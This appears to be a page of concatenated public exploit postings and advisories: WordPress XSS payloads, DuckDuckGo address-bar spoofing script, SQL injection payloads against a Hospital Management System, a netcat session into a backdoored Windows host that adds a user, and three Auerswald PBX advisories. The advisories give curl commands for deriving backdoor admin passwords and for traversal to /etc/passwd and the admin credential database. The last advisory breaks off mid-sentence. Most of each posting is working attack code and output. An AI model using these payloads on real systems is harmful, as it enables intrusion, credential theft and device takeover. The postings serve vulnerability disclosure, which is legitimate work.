<pre><code># Exploit Title: WordPress Plugin IP2Location Country Blocker 2.26.7 - Stored Cross Site Scripting (XSS) (Authenticated)<br /># Date: 02-02-2022<br /># Exploit Author: Ahmet Serkan Ari<br /># Software Link: https://wordpress.org/plugins/ip2location-country-blocker/<br /># Version: 2.26.7<br /># Tested on: Linux<br /># CVE: N/A<br /># Thanks: Ceylan Bozogullarindan<br /><br /><br /># Description:<br />IP2Location Country Blocker is a plugin enables user to block unwanted traffic from accesing Wordpress frontend (blog pages) or backend (admin area) by countries or proxy servers. It helps to reduce spam and unwanted sign ups easily by preventing unwanted visitors from browsing a particular page or entire website.<br />An authenticated user is able to inject arbitrary Javascript or HTML code to the "Frontend Settings" interface available in settings page of the plugin (Country Blocker), due to incorrect sanitization of user-supplied data and achieve a Stored Cross-Site Scripting attack against the administrators or the other authenticated users. The plugin versions prior to 2.26.7 are affected by this vulnerability.<br /><br /><br />The details of the discovery are given below.<br /><br /># Steps To Reproduce:<br />1. Install and activate the IP2Location Country Blocker plugin.<br />2. Visit the "Frontend Settings" interface available in settings page of the plugin that is named "Country Blocker".<br />3. Check the "Enable Frontend Blocking" option.<br />4. Choose the "URL" option for the "Display page when visitor is blocked" setting.<br />5. Type the payload given below to the "URL" input where is in the "Other Settings" area.<br /><br />http://country-blocker-testing.com/test#"'><script>alert(document.domain)</script><br /><br />6. Click the "Save Changes" button.<br />7. The XSS will be triggered on the settings page when every visit of an authenticated user.<br /></code></pre>
<pre><code>#Vulnerability: Address Bar Spoofing Vulnerability<br />Product: DuckDuckGo<br />Discovered by: Rafay Baloch and Muhammad Samak<br />#Version: 7.64.4<br />#Impact: Moderate<br />#Company: Cyber Citadel<br />#Website: https://www.cybercitadel.com<br /><br /><br />*Description*<br /><br />DuckDuckGo browser for iOS was prone to an "Address Bar Spoofing"<br />vulnerability due to mishandling of javaScript's window.open function<br />which is used to open a secondary browser window. This could be exploited<br />by tricking the users into supplying senstive information such as<br />username/passwords etc due to the fact that the address bar would display a<br />legitimate URL, however it would be hosted on the attacker's page.<br /><br /><br /><br />*Proof of Concept (POC)*<br /><br />Following is the POC that could be used to reproduce the issue:<br /><br /><script><br /> function spoof(){<br /> location="https://www.google.com/csi?random="+Math.random();<br /> document.body.innerHTML='This is not Google!';("This is not google.com<br /></h1>");}<br /></script><br /><input type="button" value="Run"<br />onclick="setInterval("spoof()",20);"/><br /><br /><br /><br />*Impact*<br /><br />The issue could be abused to carry out more effective phishing attacks<br />against it's users.<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross Site Scripting (XSS)<br /># Date: 2022-02-04<br /># Author: Milad karimi<br /># Software Link: https://wordpress.org/plugins/cf7-international-sms-integration/<br /># Version: 1.2<br /># Tested on: Windows 11<br /># CVE: N/A<br /><br />1. Description:<br />This plugin creates a cf7-international-sms-integration from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.<br /><br />2. Proof of Concept:<br />http://localhost/cf7-international-sms-integration/includes/admin/class-sms-log-display.php?page=<script>alert("test")</script><br /><br />//By [Ex3ptionaL]<br /></code></pre>
<pre><code>Advisory: Auerswald COMpact Multiple Backdoors<br /><br /><br />RedTeam Pentesting discovered several backdoors in the firmware for the<br />Auerswald COMpact 5500R PBX. These backdoors allow attackers who are<br />able to access the web-based management application full administrative<br />access to the device.<br /><br /><br />Details<br />=======<br /><br />Product: COMpact 3000 ISDN, COMpact 3000 analog, COMpact 3000 VoIP, COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")<br />Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX)), <= 4.0S (COMpact 3000 ISDN, COMpact 3000 analog, COMpact 3000 VoIP)<br />Fixed Versions: 8.2B, 4.0T<br />Vulnerability Type: Backdoor<br />Security Risk: high<br />Vendor URL: https://www.auerswald.de/en/product/compact-5500r<br />Vendor Status: fixed version released<br />Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-007<br />Advisory Status: published<br />CVE: CVE-2021-40859<br />CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40859<br /><br /><br />Introduction<br />============<br /><br />"Fully modular VoIP appliance for more efficient communication processes<br />With the COMpact 5500R, you are originally equipped for everyday<br />business - now and in the future.<br /><br />The fully modular architecture with 80 IP channels and all the functions<br />of a large ITC server allows up to 112 subscribers and thus scales with<br />your company.<br /><br />Continuous maintanance and expansion of the system software makes this<br />versatile IP server a future-proof investment in any business<br />communication."<br /><br />(from the vendor's homepage)<br /><br /><br />More Details<br />============<br /><br />Two backdoor passwords were found in the firmware of the COMpact 5500R<br />PBX. One backdoor password is for the secret user "Schandelah", the<br />other can be used for the highest-privileged user "Admin". No way was<br />discovered to disable these backdoors.<br /><br /><br />Proof of Concept<br />================<br /><br />The firmware for the COMpact 5500R can be downloaded from the vendor's<br />homepage[1]. The following details refer to firmware version 7.8A, but<br />the latest firmware at the time of writing (8.0B) is affected as well.<br /><br />Inspecting the downloaded file reveals that it is compressed and can be<br />extracted with the program "gunzip":<br /><br />------------------------------------------------------------------------<br />$ file 7_8A_002_COMpact5500.rom<br />7_8A_002_COMpact5500.rom: gzip compressed data, last modified: Wed Sep 23<br />15:04:43 2020, from Unix, original size 196976698<br /><br />$ mv 7_8A_002_COMpact5500.rom 7_8A_002_COMpact5500.gz<br /><br />$ gunzip 7_8A_002_COMpact5500.gz<br />------------------------------------------------------------------------<br /><br />Analysing the resulting file again shows that it is an image file in the<br />format required by the bootloader "Das U-Boot"[2], a popular bootloader<br />for embedded devices:<br /><br />------------------------------------------------------------------------<br />$ file 7_8A_002_COMpact5500.rom<br /><br />7_8A_002_COMpact5500.rom: u-boot legacy uImage, CP5500 125850, Linux/ARM,<br />Multi-File Image (Not compressed), 196976634 bytes, Wed Sep 23 15:04:38<br />2020, Load Address: 0x00000000, Entry Point: 0x00000000, Header CRC: 0<br />xCECA93E8, Data CRC: 0x99E65DF1<br />------------------------------------------------------------------------<br /><br />The program "dumpimage" (included with u-boot) can be used to list the<br />partitions in the image file:<br /><br />------------------------------------------------------------------------<br />$ dumpimage -l 7_8A_002_COMpact5500.rom<br />Image Name:<br />CP5500 125850<br />Created:<br />Wed Sep 23 17:04:38 2020<br />Image Type:<br />ARM Linux Multi-File Image (uncompressed)<br />Data Size:<br />196976634 Bytes = 192359.99 KiB = 187.85 MiB<br />Load Address: 00000000<br />Entry Point: 00000000<br />Contents:<br />Image 0: 512 Bytes = 0.50 KiB = 0.00 MiB<br />Image 1: 196976110 Bytes = 192359.48 KiB = 187.85 MiB<br />------------------------------------------------------------------------<br /><br />The larger partition then was extracted into the file "rootfs" as<br />follows:<br /><br />------------------------------------------------------------------------<br />$ dumpimage -i 7_8A_002_COMpact5500.rom -p 1 rootfs<br />------------------------------------------------------------------------<br /><br />Contained in the file is an ext2-compatible file system, which was<br />mounted at "/mnt" and inspected:<br /><br />------------------------------------------------------------------------<br />$ file rootfs<br /><br />rootfs: Linux rev 1.0 ext2 filesystem data, UUID=c3604712-a2ca-412f-81ca-<br />f302d7f20ef1, volume name "7.8A_002_125850."<br /><br />$ sudo mount -o loop,ro rootfs /mnt<br /><br />$ cat /mnt/etc/passwd<br />root::0:0:root:/root:/bin/sh<br />netstorage::1:1::/data/ftpd:/bin/false<br />web::2:2::/opt/auerswald/lighttpd:/bin/false<br />------------------------------------------------------------------------<br /><br />The PBX runs the web server lighttpd[3], the configuration files can be<br />found in the folder "/opt/auerswald/lighttpd". The web server forwards<br />most requests via FastCGI to the program "/opt/auerswald/web/webserver".<br />This program can then be analysed, for example using the reverse<br />engineering program Ghidra[4].<br /><br />The manual for the PBX reveals that in order to manage the device, users<br />need to log in with the username "sub-admin". When this string is<br />searched within the program in Ghidra, the function which checks<br />passwords on login can be identified.<br /><br />It can easily be seen that besides the username "sub-admin" the function<br />also checks for the hard-coded username "Schandelah", which is the<br />village of Auerswald's headquarter. Further analysis revealed that the<br />corresponding password for this username is derived by concatenating the<br />PBX's serial number, the string "r2d2" and the current date, hashing it<br />with the MD5 hash algorithm and taking the first seven lower-case hex<br />chars of the result.<br /><br />All data needed to derive the password can be accessed without<br />authentication by requesting the path "/about_state", which is also used<br />on the website the PBX redirects users to who abort the password prompt<br />(shortened and formatted to increase readability):<br /><br />------------------------------------------------------------------------<br />$ curl --include https://192.168.1.2/about_state<br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{<br /> "pbx": "COMpact 5500R",<br /> "pbxType": 35,<br /> "pbxId": 0,<br /> "version": "Version 7.8A - Build 002 ",<br /> "serial": "1234123412",<br /> "date": "30.08.2021",<br /> [...]<br />}<br />------------------------------------------------------------------------<br /><br />The password can be derived as follows:<br /><br />------------------------------------------------------------------------<br />$ echo -n 1234123412r2d230.08.2021 | md5sum | egrep -o '^.{7}'<br />1432d89<br />------------------------------------------------------------------------<br /><br />This password can then be used for authentication:<br /><br />------------------------------------------------------------------------<br />$ curl --include --user 'Schandelah:1432d89' --anyauth \<br /> https://192.168.1.2/tree<br /><br />HTTP/1.1 302 Found<br />Location: /statics/html/page_servicetools.html<br />Set-Cookie: AUERSessionID1234123412=AXCTMGGCCUAGBSE; HttpOnly; Path=/<br />[...]<br />------------------------------------------------------------------------<br /><br />Next, the endpoint "/logstatus_state" can be queried using the returned<br />session ID to check the access level:<br /><br />------------------------------------------------------------------------<br />% curl --cookie 'AUERSessionID1234123412=AXCTMGGCCUAGBSE' --include \<br /> https://192.168.1.2/logstatus_state<br /><br />HTTP/1.1 200 OK<br />X-XSS-Protection: 1<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{"logstatus":"Haendler"}<br />------------------------------------------------------------------------<br /><br />The returned access level is "Haendler" (reseller). After login, the web<br />server redirects to a special service page at the path<br />"/statics/html/page_servicetools.html". Among other things, it allows to<br />download a backup of all data on the device, configure audio recording<br />and reset the password, PIN and token for the user "Admin". Accessing<br />regular administrative functions is not possible directly with this user<br />account.<br /><br />When inspecting the password checking function, a second backdoor can be<br />found. When the username "Admin" is specified, the given password is<br />tested against the configured password as well as a password derived in<br />a similar way from the PBX's serial number, the string "r2d2", the<br />current date and the configured language. The MD5 hash is taken and the<br />specified password is tested against the first seven characters of the<br />lower case hexadecimal hash.<br /><br />The backdoor password for the "Admin" user can be calculated as follows:<br /><br />------------------------------------------------------------------------<br />$ echo -n 1234123412r2d230.08.2021DE | md5sum | egrep -o '^.{7}'<br />92fcdd9<br />------------------------------------------------------------------------<br /><br />The server returns a session ID for that password and the username<br />"Admin":<br /><br />------------------------------------------------------------------------<br />$ curl --user 'Admin:92fcdd9' --anyauth --include \<br /> https://192.168.1.2/tree<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />Set-Cookie: AUERSessionID1234123412=MLJHCDLPMXPNKWY; HttpOnly; Path=/<br />[...]<br /><br />[{"login":3,"userId":0,"userName":"",[...]}]<br />------------------------------------------------------------------------<br /><br />Checking the access level of the session reveals the status<br />"Administrator":<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=MLJHCDLPMXPNKWY' --include \<br /> https://192.168.1.2/logstatus_state<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{"logstatus":"Administrator"}<br />------------------------------------------------------------------------<br /><br /><br />Workaround<br />==========<br /><br />Disable or restrict access to the web-based management interface if<br />possible.<br /><br /><br />Fix<br />===<br /><br />Upgrade to a firmware version which corrects this vulnerability.<br /><br /><br />Security Risk<br />=============<br /><br />By inspecting the firmware for the COMpact 5500R PBX, attackers can<br />easily discover two backdoor passwords. One password is for the secret<br />user account with the username "Schandelah", the other works as an<br />alternative password for the user "Admin". Using the backdoor, attackers<br />are granted access to the PBX with the highest privileges, enabling them<br />to completely compromise the device. The passwords are derived from the<br />serial number, the current date and the configured language.<br /><br />The backdoor passwords are not documented. They secretly coexist with a<br />documented password recovery function supported by the vendor. No way<br />was found to disable the backdoor access.<br /><br />All information needed to derive the passwords can be requested over the<br />network without authentication, so attackers only require network access<br />to the web-based management interface.<br /><br />Due to the ease of exploitation and severe consequences, the backdoor<br />passwords are rated as a high risk.<br /><br /><br />Timeline<br />========<br /><br />2021-08-26 Vulnerability identified<br />2021-09-01 Customer approved disclosure to vendor<br />2021-09-10 Vendor notified<br />2021-09-10 CVE ID requested<br />2021-09-10 CVE ID assigned<br />2021-10-05 Vendor provides access to device with fixed firmware<br />2021-10-11 Vendor provides fixed firmware<br />2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected<br />2021-12-06 Advisory published<br /><br /><br />References<br />==========<br /><br />[1] https://www.auerswald.de/de/support/download/firmware-compact-5500<br />[2] https://www.denx.de/wiki/U-Boot<br />[3] https://www.lighttpd.net<br />[4] https://ghidra-sre.org<br /><br /><br />RedTeam Pentesting GmbH<br />=======================<br /><br />RedTeam Pentesting offers individual penetration tests performed by a<br />team of specialised IT-security experts. Hereby, security weaknesses in<br />company networks or products are uncovered and can be fixed immediately.<br /><br />As there are only few experts in this field, RedTeam Pentesting wants to<br />share its knowledge and enhance the public knowledge with research in<br />security-related areas. The results are made available as public<br />security advisories.<br /><br />More information about RedTeam Pentesting can be found at:<br />https://www.redteam-pentesting.de/<br /><br /><br />Working at RedTeam Pentesting<br />=============================<br /><br />RedTeam Pentesting is looking for penetration testers to join our team<br />in Aachen, Germany. If you are interested please visit:<br />https://www.redteam-pentesting.de/jobs/<br /><br /><br />-- <br />RedTeam Pentesting GmbH Tel.: +49 241 510081-0<br />Dennewartstr. 25-27 Fax : +49 241 510081-99<br />52068 Aachen https://www.redteam-pentesting.de<br />Germany Registergericht: Aachen HRB 14004<br />Geschäftsführer: Patrick Hof, Jens Liebchen<br /></code></pre>
<pre><code>## Title: Hospital Management System v4.0 Multiple SQL-Injections<br />## Author: nu11secur1ty<br />## Date: 02.06.2022<br />## Vendor: https://github.com/kishan0725<br />## Software: https://github.com/kishan0725/Hospital-Management-System<br />## CVE-2022-24263<br /><br /><br />## Description:<br />The Hospital Management System v4.0 is suffering from Multiple<br />SQL-Injections via three parameters in function.php, contact.php, and<br />func3.php applications.<br />The attacker can be receiving the all information from the system by<br />using this vulnerability, and also the malicious actor can use<br />sensitive information from the customers of this system.<br />WARNING: If this is in some external domain, or some subdomain, or<br />internal, this will be extremely dangerous!<br />Status: CRITICAL<br /><br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: txtName (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: txtName=821761' AND (SELECT 9346 FROM<br />(SELECT(SLEEP(3)))HJGv) AND<br />'xkCZ'='xkCZ&txtEmail=xstxPhYW@https://github.com/kishan0725/Hospital-Management-System&txtPhone=813-439-23'+(select<br />load_file('\\\\k0lnu24kl14z5bxcoo5tj7z4bvho5fz3q6ey1qpf.https://github.com/kishan0725/Hospital-Management-System\\hgq'))+'&btnSubmit=Send<br />Message&txtMsg=441931<br />---<br /><br />-------------------------------------------<br /><br />---<br />Parameter: #1* ((custom) POST)<br /> Type: error-based<br /> Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)<br /> Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2936)<br />OR 1 GROUP BY CONCAT(0x7162706271,(SELECT (CASE WHEN (5080=5080) THEN<br />1 ELSE 0 END)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING<br />MIN(0)#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (random number) - 1 column<br /> Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2730)<br />UNION ALL SELECT<br />8185,8185,CONCAT(0x7162706271,0x5777534a4b68716f6d4270614362544c4954786a4f774b6852586b47694945644a70757262644c52,0x716b767a71),8185,8185,8185,8185,8185#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login<br />---<br /><br />-------------------------------------------<br /><br />---<br />Parameter: #1* ((custom) POST)<br /> Type: error-based<br /> Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)<br /> Payload: username3=CHnDaCTc'+(select-2423) OR 1 GROUP BY<br />CONCAT(0x71626a6271,(SELECT (CASE WHEN (5907=5907) THEN 1 ELSE 0<br />END)),0x716b766b71,FLOOR(RAND(0)*2)) HAVING<br />MIN(0)#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (random number) - 1 column<br /> Payload: username3=CHnDaCTc'+(select-3282) UNION ALL SELECT<br />CONCAT(0x71626a6271,0x446c68526a796c4475676e54774d6b617a6977736855756f63796f43686d706c637877534a557076,0x716b766b71),4829,4829,4829,4829#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login<br />---<br /><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-24263)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/m4hnm1)<br /><br /></code></pre>
<pre><code>Advisory: Auerswald COMpact Arbitrary File Disclosure<br /><br /><br />RedTeam Pentesting discovered a vulnerability in the web-based<br />management interface of the Auerswald COMpact 5500R PBX which allows<br />users with the "sub-admin" privilege to access any files on the PBX's<br />file system.<br /><br /><br />Details<br />=======<br /><br />Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")<br />Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))<br />Fixed Versions: 8.2B<br />Vulnerability Type: Arbitrary File Disclosure<br />Security Risk: medium<br />Vendor URL: https://www.auerswald.de/en/product/compact-5500r<br />Vendor Status: fixed version released<br />Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-006<br />Advisory Status: published<br />CVE: CVE-2021-40858<br />CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40858<br /><br /><br />Introduction<br />============<br /><br />"Fully modular VoIP appliance for more efficient communication processes<br />With the COMpact 5500R, you are originally equipped for everyday<br />business - now and in the future.<br /><br />The fully modular architecture with 80 IP channels and all the functions<br />of a large ITC server allows up to 112 subscribers and thus scales with<br />your company.<br /><br />Continuous maintanance and expansion of the system software makes this<br />versatile IP server a future-proof investment in any business<br />communication."<br /><br />(from the vendor's homepage)<br /><br /><br />More Details<br />============<br /><br />RedTeam Pentesting discovered that attackers with administrative access<br />to the PBX's web-based management interface (as a so-called "sub-admin")<br />can download arbitrary files from the PBX's file system. This includes<br />the usually not accessible configuration database which contains the<br />password for the highly privileged "Admin" user in clear text.<br /><br /><br />Proof of Concept<br />================<br /><br />The command-line HTTP client curl[1] can be used to log into the<br />management interface of the PBX with the username "sub-admin" and the<br />password "verysecretpassword" as follows:<br /><br />------------------------------------------------------------------------<br />$ curl --anyauth --user sub-admin:verysecretpassword --include \<br /> https://192.168.1.2/tree<br /><br />[...]<br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/<br />[...]<br /><br />[{"login":2,"userId":2222,[...]}]<br />------------------------------------------------------------------------<br /><br />The server returns a session ID in a cookie which is then used to check<br />the access level:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \<br /> https://192.168.1.2/logstatus_state<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{"logstatus":"Sub-Administrator"}<br />------------------------------------------------------------------------<br /><br />In the PBX's user management, the access level "Sub-Administrator" is<br />used for user accounts who should be able to configure the PBX. There<br />are also other, higher-level access privileges.<br /><br />Users with the "sub-admin" privilege can configure music on hold (MOH,<br />"Wartemusik"), and for example listen to the currently configured music.<br />In order to do this, the browser requests the music files from the PBX.<br /><br />The file "alarm1.wav" can be accessed with curl as follows:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \<br />'https://192.168.1.2/wartemusik_verwaltung_play?fileName=alarm1.wav'\<br />'&pageindex=1'<br /><br />HTTP/1.1 200 OK<br />Content-Type: audio/x-wav; charset=<br />Content-Length: 132192<br />Content-disposition: attachment; filename="alarm1.wav"<br />[...]<br />------------------------------------------------------------------------<br /><br />It was found that the PBX allows directory traversal with the string<br />"../", so the file "/etc/passwd" can be accessed as follows:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \<br />'https://192.168.1.2/wartemusik_verwaltung_play?'\<br />'fileName=../../etc/passwd&pageindex='<br /><br />HTTP/1.1 200 OK<br />[...]<br />Content-Length: 113<br />Content-disposition: attachment; filename="../../etc/passwd"<br />[...]<br /><br />root::0:0:root:/root:/bin/sh<br />netstorage::1:1::/data/ftpd:/bin/false<br />web::2:2::/opt/auerswald/lighttpd:/bin/false<br />------------------------------------------------------------------------<br /><br />The same issue is present in the function for managing logos. A regular<br />request for the file "logo1.jpg" is shown below:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \<br />'https://192.168.1.2/logo_verwaltung_preview?fileName=logo1.jpg&424'<br /><br />HTTP/1.1 200 OK<br />X-XSS-Protection: 1<br />Content-Type: image/jpg; charset=UTF-8<br />Content-Length: 13986<br />Content-disposition: attachment; filename="logo1.jpg"<br />[...]<br />------------------------------------------------------------------------<br /><br />In a similar fashion as before, the file "/etc/passwd" can be accessed:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \<br />'https://192.168.1.2/logo_verwaltung_preview?fileName=../../etc/passwd'<br /><br />HTTP/1.1 200 OK<br />[...]<br /><br />root::0:0:root:/root:/bin/sh<br />netstorage::1:1::/data/ftpd:/bin/false<br />web::2:2::/opt/auerswald/lighttpd:/bin/false<br />------------------------------------------------------------------------<br /><br />For attackers, an interesting file is the SQLite[2] database file<br />"/data/db/pbx4.db". It can be downloaded as follows:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' 'https://'\<br />'192.168.1.2/logo_verwaltung_preview?fileName=../../data/db/pbx4.db' \<br /> > pbx4.db<br /><br /> % Total % Received % Xferd Average Speed Time Time Time Current<br /> Dload Upload Total Spent Left Speed<br />100 5120 100 5120 0 0 16253 0 --:--:-- --:--:-- --:--:-- 16305<br />------------------------------------------------------------------------<br /><br />This file contains the password for the highly privileged "Admin" user<br />account:<br /><br />------------------------------------------------------------------------<br />$ sqlite3 pbx4.db<br />SQLite version 3.27.2 2019-02-25 16:06:06<br />Enter ".help" for usage hints.<br /><br />sqlite> .tables<br />DbFileVersion PbxMisc<br /><br />sqlite> select * from PbxMisc;<br />[...]<br />AdminPasswdHash|<br />AdminLogin|Admin<br />AdminPin|43214321<br />AdminPasswd|S3kr1t!<br />------------------------------------------------------------------------<br /><br />The username and password can then be used to log into the web<br />application:<br /><br />------------------------------------------------------------------------<br />$ curl --user 'Admin:S3kr1t!' --anyauth --include \<br /> https://192.168.1.2/tree<br /><br />HTTP/1.1 200 OK<br />Set-Cookie: AUERSessionID1234123412=AJXGKBFTCIHSHAC; HttpOnly; Path=/<br />[...]<br /><br />[{"login":3,"userId":0,"userName":"",[...]}]<br />------------------------------------------------------------------------<br /><br />Checking the access level reveals the new privilege:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=AJXGKBFTCIHSHAC' --include \<br /> https://192.168.1.2/logstatus_state<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{"logstatus":"Administrator"}<br />------------------------------------------------------------------------<br /><br />The user "Admin", in contrast to regular administrative users<br />("sub-admin"), can access more functions and for example apply firmware<br />updates.<br /><br />Workaround<br />==========<br /><br />Disable or restrict access to the web-based management if possible.<br /><br /><br />Fix<br />===<br /><br />Upgrade to a firmware version which corrects this vulnerability.<br /><br /><br />Security Risk<br />=============<br /><br />Attackers who already have acquired administrative access as a so-called<br />"sub-admin" can download a database file and access the password for the<br />highly privileged "Admin" account. This account can use more functions and<br />is allowed to apply firmware updates.<br /><br />On the one hand, exploiting this vulnerability already requires<br />administrative access. On the other hand, attackers can reach<br />high-privileged access to the PBX and use functions not available to<br />"sub-admin" users, like firmware updates. All in all, this vulnerability<br />is therefore rated to have a medium risk potential.<br /><br /><br />Timeline<br />========<br /><br />2021-08-26 Vulnerability identified<br />2021-09-01 Customer approved disclosure to vendor<br />2021-09-10 Vendor notified<br />2021-09-10 CVE ID requested<br />2021-09-10 CVE ID assigned<br />2021-10-05 Vendor provides access to device with fixed firmware<br />2021-10-11 Vendor provides fixed firmware<br />2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected<br />2021-12-06 Advisory published<br /><br /><br />References<br />==========<br /><br />[1] https://curl.se<br />[2] https://www.sqlite.org<br /><br /><br />RedTeam Pentesting GmbH<br />=======================<br /><br />RedTeam Pentesting offers individual penetration tests performed by a<br />team of specialised IT-security experts. Hereby, security weaknesses in<br />company networks or products are uncovered and can be fixed immediately.<br /><br />As there are only few experts in this field, RedTeam Pentesting wants to<br />share its knowledge and enhance the public knowledge with research in<br />security-related areas. The results are made available as public<br />security advisories.<br /><br />More information about RedTeam Pentesting can be found at:<br />https://www.redteam-pentesting.de/<br /><br /><br />Working at RedTeam Pentesting<br />=============================<br /><br />RedTeam Pentesting is looking for penetration testers to join our team<br />in Aachen, Germany. If you are interested please visit:<br />https://www.redteam-pentesting.de/jobs/<br /><br /><br />-- <br />RedTeam Pentesting GmbH Tel.: +49 241 510081-0<br />Dennewartstr. 25-27 Fax : +49 241 510081-99<br />52068 Aachen https://www.redteam-pentesting.de<br />Germany Registergericht: Aachen HRB 14004<br />Geschäftsführer: Patrick Hof, Jens Liebchen<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/9f11868c3beaa8e2c1f5c193f5888b85.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Small.er<br />Vulnerability: Unauthenticated Remote Command Execution <br />Description: The malware listens on TCP port 5600. Third-party attackers who can reach infected systems can run any OS commands.<br />Type: PE32<br />MD5: 9f11868c3beaa8e2c1f5c193f5888b85<br />Vuln ID: MVID-2022-0480<br />Disclosure: 02/05/2022<br /><br />Exploit/PoC:<br />Note: hit enter twice for each command.<br /><br />nc64.exe x.x.x.x 5600<br /><br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\dump><br /><br />C:\dump><br />cd \Windows<br />C:\dump>cd \Windows<br /><br />C:\Windows><br />C:\Windows>whoami<br />whoami<br /><br />desktop-2c3jqho\victim<br /><br />C:\Windows><br /><br />C:\Windows><br />net user hyp3rlinx 666 /add<br />C:\Windows>net user hyp3rlinx 666 /add<br /><br />The command completed successfully.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Advisory: Auerswald COMpact Privilege Escalation<br /><br /><br />RedTeam Pentesting discovered a vulnerability in the web-based<br />management interface of the Auerswald COMpact 5500R PBX which allows<br />low-privileged users to access passwords of administrative user accounts.<br /><br /><br />Details<br />=======<br /><br />Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")<br />Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))<br />Fixed Versions: 8.2B<br />Vulnerability Type: Privilege Escalation<br />Security Risk: high<br />Vendor URL: https://www.auerswald.de/en/product/compact-5500r<br />Vendor Status: fixed version released<br />Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-005<br />Advisory Status: published<br />CVE: CVE-2021-40857<br />CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40857<br /><br /><br />Introduction<br />============<br /><br />"Fully modular VoIP appliance for more efficient communication processes<br />With the COMpact 5500R, you are originally equipped for everyday<br />business - now and in the future.<br /><br />The fully modular architecture with 80 IP channels and all the functions<br />of a large ITC server allows up to 112 subscribers and thus scales with<br />your company.<br /><br />Continuous maintanance and expansion of the system software makes this<br />versatile IP server a future-proof investment in any business<br />communication."<br /><br />(from the vendor's homepage)<br /><br /><br />More Details<br />============<br /><br />Attackers with low-privileged user accounts, for example those that are<br />used by VoIP phones, can log into the web-based management interface of<br />the COMpact 